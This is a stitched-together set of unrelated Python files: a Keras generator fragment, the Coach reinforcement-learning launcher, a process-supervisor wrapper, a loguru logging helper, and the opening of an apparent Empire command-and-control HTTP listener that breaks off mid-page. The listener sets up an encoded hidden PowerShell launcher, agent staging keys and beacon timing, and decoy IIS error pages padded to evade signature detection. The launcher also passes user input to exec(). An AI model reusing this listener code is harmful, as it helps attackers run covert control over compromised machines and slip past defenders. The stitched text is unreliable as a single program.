all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
coach.py
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
sys.path.append('.')
import ray
import dill
import socket
import weakref
import copy
from rl_coach.core_types import EnvironmentSteps
import os
from rl_coach import logger
import traceback
from rl_coach.logger import screen, failed_imports
import argparse
import threading
import atexit
import time
import sys
from rl_coach.base_parameters import Frameworks, VisualizationParameters, TaskParameters, DistributedTaskParameters
from multiprocessing.managers import BaseManager
from multiprocessing import Process
import multiprocessing
import subprocess
from rl_coach.graph_managers.graph_manager import HumanPlayScheduleParameters, GraphManager
from rl_coach.utils import list_all_presets, short_dynamic_import, get_open_port, SharedMemoryScratchPad, get_base_dir
from rl_coach.agents.human_agent import HumanAgentParameters
from rl_coach.graph_managers.basic_rl_graph_manager import BasicRLGraphManager
from rl_coach.environments.environment import SingleLevelSelection
from create_worker import create_worker_devcloud
import warnings
warnings.filterwarnings("ignore")
if len(set(failed_imports)) > 0:
screen.warning("Warning: failed to import the following packages - {}".format(', '.join(set(failed_imports))))
def get_graph_manager_from_args(args: argparse.Namespace) -> 'GraphManager':
"""
Return the graph manager according to the command line arguments given by the user
:param args: the arguments given by the user
:return: the updated graph manager
"""
graph_manager = None
# if a preset was given we will load the graph manager for the preset
if args.preset is not None:
graph_manager = short_dynamic_import(args.preset, ignore_module_case=True)
# for human play we need to create a custom graph manager
if args.play:
env_params = short_dynamic_import(args.environment_type, ignore_module_case=True)()
env_params.human_control = True
schedule_params = HumanPlayScheduleParameters()
graph_manager = BasicRLGraphManager(HumanAgentParameters(), env_params, schedule_params, VisualizationParameters())
if args.level:
if isinstance(graph_manager.env_params.level, SingleLevelSelection):
graph_manager.env_params.level.select(args.level)
else:
graph_manager.env_params.level = args.level
# set the seed for the environment
if args.seed is not None:
graph_manager.env_params.seed = args.seed
# visualization
graph_manager.visualization_parameters.dump_gifs = graph_manager.visualization_parameters.dump_gifs or args.dump_gifs
graph_manager.visualization_parameters.dump_mp4 = graph_manager.visualization_parameters.dump_mp4 or args.dump_mp4
graph_manager.visualization_parameters.render = args.render
graph_manager.visualization_parameters.tensorboard = args.tensorboard
graph_manager.visualization_parameters.print_networks_summary = args.print_networks_summary
# update the custom parameters
if args.custom_parameter is not None:
unstripped_key_value_pairs = [pair.split('=') for pair in args.custom_parameter.split(';')]
stripped_key_value_pairs = [tuple([pair[0].strip(), pair[1].strip()]) for pair in
unstripped_key_value_pairs if len(pair) == 2]
# load custom parameters into run_dict
for key, value in stripped_key_value_pairs:
exec("graph_manager.{}={}".format(key, value))
return graph_manager
def parse_arguments(parser: argparse.ArgumentParser) -> argparse.Namespace:
"""
Parse the arguments that the user entered
:param parser: the argparse command line parser
:return: the parsed arguments
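Example invocation (the preset name and worker count are illustrative only):
    python coach.py -p CartPole_DQN -n 4 -e my_experiment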
"""
args = parser.parse_args()
# if no arg is given
if len(sys.argv) == 1:
parser.print_help()
exit(0)
# list available presets
preset_names = list_all_presets()
if args.list:
screen.log_title("Available Presets:")
for preset in sorted(preset_names):
print(preset)
sys.exit(0)
# replace a short preset name with the full path
if args.preset is not None:
if args.preset.lower() in [p.lower() for p in preset_names]:
args.preset = "{}.py:graph_manager".format(os.path.join(get_base_dir(), 'presets', args.preset))
else:
args.preset = "{}".format(args.preset)
# if a graph manager variable was not specified, try the default of :graph_manager
if len(args.preset.split(":")) == 1:
args.preset += ":graph_manager"
# verify that the preset exists
preset_path = args.preset.split(":")[0]
if not os.path.exists(preset_path):
screen.error("The given preset ({}) cannot be found.".format(args.preset))
# verify that the preset can be instantiated
try:
short_dynamic_import(args.preset, ignore_module_case=True)
except TypeError as e:
traceback.print_exc()
screen.error('Internal Error: ' + str(e) + "\n\nThe given preset ({}) cannot be instantiated."
.format(args.preset))
# validate the checkpoints args
if args.checkpoint_restore_dir is not None and not os.path.exists(args.checkpoint_restore_dir):
screen.error("The requested checkpoint folder to load from does not exist.")
# no preset was given. check if the user requested to play some environment on its own
if args.preset is None and args.play:
if args.environment_type:
args.agent_type = 'Human'
else:
screen.error('When no preset is given for Coach to run, and the user requests human control over '
'the environment, the user is expected to input the desired environment_type and level.'
'\nAt least one of these parameters was not given.')
elif args.preset and args.play:
screen.error("Both the --preset and the --play flags were set. These flags can not be used together. "
"For human control, please use the --play flag together with the environment type flag (-et)")
elif args.preset is None and not args.play:
screen.error("Please choose a preset using the -p flag or use the --play flag together with choosing an "
"environment type (-et) in order to play the game.")
# get experiment name and path
args.experiment_name = logger.get_experiment_name(args.experiment_name)
args.experiment_path = logger.get_experiment_path(args.experiment_name)
if args.play and args.num_workers > 1:
screen.warning("Playing the game as a human is only available with a single worker. "
"The number of workers will be reduced to 1")
args.num_workers = 1
args.framework = Frameworks[args.framework.lower()]
# checkpoints
args.save_checkpoint_dir = os.path.join(args.experiment_path, 'checkpoint') if args.save_checkpoint_secs is not None else None
return args
def add_items_to_dict(target_dict, source_dict):
updated_task_parameters = copy.copy(source_dict)
updated_task_parameters.update(target_dict)
return updated_task_parameters
def open_dashboard(experiment_path):
dashboard_path = 'python {}/dashboard.py'.format(get_base_dir())
cmd = "{} --experiment_dir {}".format(dashboard_path, experiment_path)
screen.log_title("Opening dashboard - experiment path: {}".format(experiment_path))
# subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, executable="/bin/bash")
subprocess.Popen(cmd, shell=True, executable="/bin/bash")
def start_graph(graph_manager: 'GraphManager', task_parameters: 'TaskParameters'):
graph_manager.create_graph(task_parameters)
# let the adventure begin
if task_parameters.evaluate_only:
graph_manager.evaluate(EnvironmentSteps(sys.maxsize), keep_networks_in_sync=True)
else:
graph_manager.improve()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--preset',
help="(string) Name of a preset to run (class name from the 'presets' directory.)",
default=None,
type=str)
parser.add_argument('-l', '--list',
help="(flag) List all available presets",
action='store_true')
parser.add_argument('-e', '--experiment_name',
help="(string) Experiment name to be used to store the results.",
default='',
type=str)
parser.add_argument('-r', '--render',
help="(flag) Render environment",
action='store_true')
parser.add_argument('-f', '--framework',
help="(string) Neural network framework. Available values: tensorflow",
default='tensorflow',
type=str)
parser.add_argument('-n', '--num_workers',
help="(int) Number of workers for multi-process based agents, e.g. A3C",
default=1,
type=int)
parser.add_argument('-c', '--use_cpu',
help="(flag) Use only the cpu for training. If a GPU is not available, this flag will have no "
"effect and the CPU will be used either way.",
action='store_true')
parser.add_argument('-ew', '--evaluation_worker',
help="(int) If multiple workers are used, add an evaluation worker as well which will "
"evaluate asynchronously and independently during the training. NOTE: this worker will "
"ignore the evaluation settings in the preset's ScheduleParams.",
action='store_true')
parser.add_argument('--play',
help="(flag) Play as a human by controlling the game with the keyboard. "
"This option will save a replay buffer with the game play.",
action='store_true')
parser.add_argument('--evaluate',
help="(flag) Run evaluation only. This is a convenient way to disable "
"training in order to evaluate an existing checkpoint.",
action='store_true')
parser.add_argument('-v', '--verbosity',
help="(flag) Sets the verbosity level of Coach print outs. Can be either low or high.",
default="low",
type=str)
parser.add_argument('-tfv', '--tf_verbosity',
help="(flag) TensorFlow verbosity level",
default=3,
type=int)
parser.add_argument('-s', '--save_checkpoint_secs',
help="(int) Time in seconds between saving checkpoints of the model.",
default=None,
type=int)
parser.add_argument('-crd', '--checkpoint_restore_dir',
help='(string) Path to a folder containing a checkpoint to restore the model from.',
type=str)
parser.add_argument('-dg', '--dump_gifs',
help="(flag) Enable the gif saving functionality.",
action='store_true')
parser.add_argument('-dm', '--dump_mp4',
help="(flag) Enable the mp4 saving functionality.",
action='store_true')
parser.add_argument('-at', '--agent_type',
help="(string) Choose an agent type class to override on top of the selected preset. "
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type",
default=None,
type=str)
parser.add_argument('-et', '--environment_type',
help="(string) Choose an environment type class to override on top of the selected preset."
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type",
default=None,
type=str)
parser.add_argument('-ept', '--exploration_policy_type',
help="(string) Choose an exploration policy type class to override on top of the selected "
"preset."
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type"
,
default=None,
type=str)
parser.add_argument('-lvl', '--level',
help="(string) Choose the level that will be played in the environment that was selected."
"This value will override the level parameter in the environment class."
,
default=None,
type=str)
parser.add_argument('-cp', '--custom_parameter',
help="(string) Semicolon separated parameters used to override specific parameters on top of"
" the selected preset (or on top of the command-line assembled one). "
"Whenever a parameter value is a string, it should be inputted as '\\\"string\\\"'. "
"For ex.: "
"\"visualization.render=False; num_training_iterations=500; optimizer='rmsprop'\"",
default=None,
type=str)
parser.add_argument('--print_networks_summary',
help="(flag) Print network summary to stdout",
action='store_true')
parser.add_argument('-tb', '--tensorboard',
help="(flag) When using the TensorFlow backend, enable TensorBoard log dumps. ",
action='store_true')
parser.add_argument('-ns', '--no_summary',
help="(flag) Prevent Coach from printing a summary and asking questions at the end of runs",
action='store_true')
parser.add_argument('-d', '--open_dashboard',
help="(flag) Open dashboard with the experiment when the run starts",
action='store_true')
parser.add_argument('--seed',
help="(int) A seed to use for running the experiment",
default=None,
type=int)
parser.add_argument('--ray_redis_address',
help="The address of the Redis server to connect to. If this address is not provided,\
then this command will start Redis, a global scheduler, a local scheduler, \
a plasma store, a plasma manager, and some workers. \
It will also kill these processes when Python exits.",
default=None,
type=str)
parser.add_argument('--ray_num_cpus',
help="Number of cpus the user wishes all local schedulers to be configured with",
default=None,
type=int)
parser.add_argument('--ray_num_gpus',
help="Number of gpus the user wishes all local schedulers to be configured with",
default=None,
type=int)
parser.add_argument('--on_devcloud',
help="(flag) Run the workers on Intel DevCloud nodes instead of locally",
action='store_true')
args = parse_arguments(parser)
graph_manager = get_graph_manager_from_args(args)
# Intel optimized TF seems to run significantly faster when limiting to a single OMP thread.
# This will not affect GPU runs.
# os.environ["OMP_NUM_THREADS"] = "1"
# turn TF debug prints off
if args.framework == Frameworks.tensorflow:
os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args.tf_verbosity)
# turn off the summary at the end of the run if necessary
if not args.no_summary:
atexit.register(logger.summarize_experiment)
screen.change_terminal_title(args.experiment_name)
# open dashboard
if args.open_dashboard:
open_dashboard(args.experiment_path)
# Single-threaded runs
if args.num_workers == 1:
# Start the training or evaluation
task_parameters = TaskParameters(framework_type="tensorflow", # TODO: tensorflow shouldn't be hardcoded
evaluate_only=args.evaluate,
experiment_path=args.experiment_path,
seed=args.seed,
use_cpu=args.use_cpu,
save_checkpoint_secs=args.save_checkpoint_secs)
task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
start_graph(graph_manager=graph_manager, task_parameters=task_parameters)
#start_graph_ray.remote(graph_manager,task_parameters)
# Multi-threaded runs
else:
#ray.init(redis_address=args.ray_redis_address,
# num_cpus=args.ray_num_cpus,
# num_gpus=args.ray_num_gpus)
total_tasks = args.num_workers
if args.evaluation_worker:
total_tasks += 1
if args.on_devcloud:
ips = create_worker_devcloud(args.num_workers)
@ray.remote
def f():
time.sleep(0.01)
#os.system('/usr/local/bin/qstat')
return ray.services.get_node_ip_address()
if args.on_devcloud:
ips = set(ray.get([f.remote() for _ in range(1000)]))
home_ip = socket.gethostbyname(socket.gethostname())
worker_ips = [z for z in ips if z != home_ip]
worker_hosts = ",".join(["{}:{}".format(n,get_open_port()) for n in ips])
else:
ray.init()
worker_hosts = ",".join(["localhost:{}".format(get_open_port()) for i in range(total_tasks)])
ps_hosts = "localhost:{}".format(get_open_port())
@ray.remote
def start_distributed_task(job_type, task_index, evaluation_worker=False):
task_parameters = DistributedTaskParameters(framework_type="tensorflow", # TODO: tensorflow shouldn't be hardcoded
parameters_server_hosts=ps_hosts,
worker_hosts=worker_hosts,
job_type=job_type,
task_index=task_index,
evaluate_only=evaluation_worker,
use_cpu=args.use_cpu,
num_tasks=total_tasks, # training tasks + 1 evaluation task
num_training_tasks=args.num_workers,
experiment_path=args.experiment_path,
shared_memory_scratchpad=None,
seed=args.seed+task_index if args.seed is not None else None) # each worker gets a different seed
task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
# we assume that only the evaluation workers are rendering
graph_manager.visualization_parameters.render = args.render and evaluation_worker
start_graph(graph_manager,task_parameters)
#p = Process(target=start_graph, args=(graph_manager, task_parameters))
#p.start()
return
@ray.remote
def start_distributed_ray_task(job_type, task_index, evaluation_worker=False):
task_parameters = DistributedTaskParameters(framework_type="tensorflow", # TODO: tensorflow shouldn't be hardcoded
parameters_server_hosts=ps_hosts,
worker_hosts=worker_hosts,
job_type=job_type,
task_index=task_index,
evaluate_only=evaluation_worker,
use_cpu=args.use_cpu,
num_tasks=total_tasks, # training tasks + 1 evaluation task
num_training_tasks=args.num_workers,
experiment_path=args.experiment_path,
shared_memory_scratchpad=None,
seed=args.seed+task_index if args.seed is not None else None) # each worker gets a different seed
task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
# we assume that only the evaluation workers are rendering
graph_manager.visualization_parameters.render = args.render and evaluation_worker
start_graph(graph_manager,task_parameters)
return 1
# parameter server
parameter_server = start_distributed_task.remote("ps", 0)
# training workers
# wait a bit before spawning the non chief workers in order to make sure the session is already created
workers = []
workers.append(start_distributed_task.remote("worker", 0))
time.sleep(2)
for task_index in range(1, args.num_workers):
workers.append(start_distributed_task.remote("worker",task_index))
# time.sleep(20)
# task_parameters = DistributedTaskParameters(framework_type="tensorflow", # TODO: tensorflow should'nt be hardcoded
# parameters_server_hosts=ps_hosts,
# worker_hosts=worker_hosts,
# job_type="worker",
# task_index=task_index,
# evaluate_only=True,
# use_cpu=args.use_cpu,
# num_tasks=total_tasks, # training tasks + 1 evaluation task
# num_training_tasks=args.num_workers,
# experiment_path=args.experiment_path,
# shared_memory_scratchpad=None,
# seed=args.seed+task_index if args.seed is not None else None) # each worker gets a different seed
# task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
# # we assume that only the evaluation workers are rendering
# graph_manager.visualization_parameters.render = args.render
# start_graph(graph_manager,task_parameters)
if __name__ == "__main__":
main()
|
wrapper.py
|
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import signal
import logging
import threading
import subprocess
from peewee import DoesNotExist
from distsuper.models.models import Process as ProcessModel
from distsuper.common import tools
from distsuper.common.constant import STATUS
logger = logging.getLogger("wrapper")
# noinspection PyUnusedLocal
def sigdefault(process, info, *args):
program_id = info['program_id']
logger.info("进程%s收到信号,即将退出" % program_id)
os.killpg(process.pid, signal.SIGKILL)
# noinspection PyUnusedLocal
def sigterm(process, info, *args):
program_id = info['program_id']
logger.info("进程%s被SIG_TERM信号杀死" % program_id)
os.killpg(process.pid, signal.SIGKILL)
# noinspection PyUnusedLocal
def fail(args, retcode, info):
program_id = info['program_id']
logger.info("进程%s执行失败" % program_id)
# noinspection PyUnusedLocal
def success(args, retcode, info):
program_id = info['program_id']
logger.info("进程%s执行成功" % program_id)
def register_signal_handlers(process, info, callbacks):
"""
:param process: the child process object
:param info: extra information that is passed through to the handlers
:param callbacks: key => signal callback
valid keys are sigint, sigquit, sigterm and sigdefault
:return:
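Example (a sketch; `process` would be a subprocess.Popen object and `info`
a dict containing at least 'program_id'):
    register_signal_handlers(process, info,
                             {'sigterm': sigterm, 'sigdefault': sigdefault})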
"""
def register_signal_handler(sig, callback, default_callback=None):
if callback and callable(callback):
signal.signal(sig, callback)
elif default_callback and callable(default_callback):
signal.signal(sig, default_callback)
def handler_wrapper(_process, _info, signal_handler):
if signal_handler is None:
return None
def __wrapper(*args):
signal_handler(_process, _info, *args)
return __wrapper
defaultcallback = handler_wrapper(process, info,
callbacks.get('sigdefault'))
register_signal_handler(signal.SIGINT,
handler_wrapper(process, info,
callbacks.get('sigint')),
default_callback=defaultcallback)
register_signal_handler(signal.SIGQUIT,
handler_wrapper(process, info,
callbacks.get('sigquit')),
default_callback=defaultcallback)
register_signal_handler(signal.SIGTERM,
handler_wrapper(process, info,
callbacks.get('sigterm')),
default_callback=defaultcallback)
def touch_db(program_id, touch_timeout):
logger.info("进程%s运行中..." % program_id)
timeout_timestamp = int(time.time() + touch_timeout)
# if the program is in the STARTING or STOPPING state, there is no need to touch the db
try:
process = ProcessModel.select() \
.where(ProcessModel.id == program_id) \
.get()
except DoesNotExist:
logger.warning("touch_db失败,没有这条记录,%s可能已停止" % program_id)
return False
if process.status in (STATUS.STARTING, STATUS.STOPPING):
return True
# noinspection PyBroadException
try:
ret = ProcessModel.update(timeout_timestamp=timeout_timestamp) \
.where(ProcessModel.id == program_id,
ProcessModel.status == STATUS.RUNNING) \
.execute()
except Exception:
logger.exception("touch_db异常")
return False
if ret == 0:
logger.warning("touch_db失败,没有这条记录,%s可能已停止" % program_id)
return False
return True
# noinspection PyBroadException
def task_wrapper(args, info):
callbacks = {
'on_success': success,
'on_fail': fail,
'sigdefault': sigdefault,
'sigterm': sigterm
}
# working directory
directory = info.get("directory")
if directory is not None:
os.chdir(directory)
# environment variables
env = os.environ
environment = info.get('environment')
if environment is not None:
environment = {
field.strip().split('=', 1)[0].strip():
field.strip().split('=', 1)[1].strip()
for field in environment.strip().split(';') if '=' in field
}
env.update(environment)
# log files
stdout_logfile = info.get('stdout_logfile', '')
stderr_logfile = info.get('stderr_logfile', '')
stdout = sys.stdout
stderr = sys.stderr
if stdout_logfile:
tools.get_logger("wrapper",
file_name=stdout_logfile,
level=logging.INFO,
reset=True)
try:
stdout = open(stdout_logfile, 'a')
except OSError:
logger.warning("无法打开文件%s,日志打印到标准输出" % stdout_logfile)
if stderr_logfile:
try:
stderr = open(stderr_logfile, 'a')
except OSError:
logger.warning("无法打开文件%s,日志打印到标准错误" % stderr_logfile)
    # start the child process
    logger.info("Starting child process")
process = subprocess.Popen(args, env=env, shell=True,
stdout=stdout, stderr=stderr,
preexec_fn=os.setsid)
    # register signal callback functions
register_signal_handlers(process, info, callbacks)
# noinspection PyBroadException
def touch_db_loop(_stop_info):
while True:
try:
if _stop_info["stop"]:
break
if not touch_db(info['program_id'], info['touch_timeout']):
p = _stop_info["process"]
logger.error("touch db失败,进程即将退出")
os.killpg(p.pid, signal.SIGKILL)
break
except Exception:
logger.exception("touch db发生未知异常")
time.sleep(1)
    # touch db thread
stop_info = {
"stop": False,
"process": process
}
thread = threading.Thread(target=touch_db_loop, args=(stop_info,))
thread.start()
    # handle the child process exit code
retcode = process.wait()
stop_info["stop"] = True
if retcode == 0:
if 'on_success' in callbacks and \
callable(callbacks['on_success']):
callbacks['on_success'](args, retcode, info)
else:
if 'on_fail' in callbacks and \
callable(callbacks['on_fail']):
callbacks['on_fail'](args, retcode, info)
thread.join()
def main():
try:
pid = os.fork()
except OSError:
sys.exit(1)
if pid != 0:
sys.exit(0)
os.setsid()
args = json.loads(sys.argv[1])
info = json.loads(sys.argv[2])
task_wrapper(args, info)
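# Invocation sketch (hedged: the exact argv shape depends on how distsuper launches the wrapper):
#
#     python wrapper.py '"sleep 60"' \
#         '{"program_id": 1, "touch_timeout": 10, "directory": "/tmp", "environment": "A=1;B=2"}'
#
# main() daemonizes via fork()/setsid(), then JSON-decodes argv[1] as the command and
# argv[2] as the info dict before handing both to task_wrapper().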
|
logging.py
|
# -*- coding: utf-8 -*-
import queue
import logging
from threading import Thread
from datetime import timedelta
from loguru._file_sink import FileSink
from najapy.common.async_base import Utils
class LogFileRotator:
@classmethod
def make(cls, _size=500, _time=r'00:00'):
return cls(_size, _time).should_rotate
def __init__(self, _size, _time):
_size = _size * (1024 ** 2)
_time = Utils.split_int(_time, r':')
now_time = Utils.today()
self._size_limit = _size
self._time_limit = now_time.replace(hour=_time[0], minute=_time[1])
if now_time >= self._time_limit:
self._time_limit += timedelta(days=1)
def should_rotate(self, message, file):
file.seek(0, 2)
if file.tell() + len(message) > self._size_limit:
return True
if message.record[r'time'].timestamp() > self._time_limit.timestamp():
self._time_limit += timedelta(days=1)
return True
return False
DEFAULT_LOG_FILE_ROTATOR = LogFileRotator.make()
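# Usage sketch (assumes Utils.log is a loguru logger, as init_logger below suggests): loguru
# accepts a callable for its `rotation` option, so the rotator can be wired up like
#
#     Utils.log.add("runtime.log", rotation=LogFileRotator.make(_size=100, _time="03:00"))
#
# which rotates once the file exceeds ~100 MB or the daily 03:00 boundary is crossed.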
class LogInterceptor(logging.Handler):
"""日志拦截器
"""
def emit(self, record):
Utils.log.opt(
depth=6,
exception=record.exc_info
).log(
record.levelname,
record.getMessage()
)
DEFAULT_LOG_INTERCEPTOR = LogInterceptor()
class QueuedFileSink(FileSink):
"""日志文件队列
"""
def __init__(self, path, *, buffer_size=0, buffer_block=False, **kwargs):
super().__init__(path, **kwargs)
self._buffer = queue.Queue(buffer_size)
self._buffer_size = buffer_size
self._buffer_block = buffer_block
self._worker = Thread(target=self._queued_writer, daemon=True)
self._running = True
self._worker.start()
def write(self, message):
try:
self._buffer.put(message, block=self._buffer_block)
except queue.Full as _:
print(f'Log queued writer overflow: {self._buffer_size}')
def stop(self):
self._running = False
self._worker.join(10)
super().stop()
def _queued_writer(self):
while self._running:
try:
message = self._buffer.get(block=True, timeout=1)
if message:
super().write(message)
except queue.Empty as _:
pass
def init_logger(
level, handler=None,
file_path=None, file_rotation=DEFAULT_LOG_FILE_ROTATOR, file_retention=0xff,
debug=False
):
level = level.upper()
if handler or file_path:
Utils.log.remove()
if handler:
Utils.log.add(
handler,
level=level,
enqueue=True,
backtrace=debug
)
if file_path:
Utils.log.add(
QueuedFileSink(
Utils.path.join(file_path, f'runtime_{{time}}_{Utils.getpid()}.log'),
rotation=file_rotation,
retention=file_retention
),
level=level,
enqueue=True,
backtrace=debug
)
else:
Utils.log.level(level)
logging.getLogger().addHandler(DEFAULT_LOG_INTERCEPTOR)
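# Example call (a sketch; the level and file_path values are illustrative, not project defaults):
#
#     init_logger("info", file_path="/var/log/myapp", debug=True)
#
# This removes loguru's default sink, adds a QueuedFileSink writing runtime_<time>_<pid>.log
# files under file_path, and bridges stdlib logging into loguru via DEFAULT_LOG_INTERCEPTOR.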
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
        # if the current session cookie is empty, generate a random cookie for this listener
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
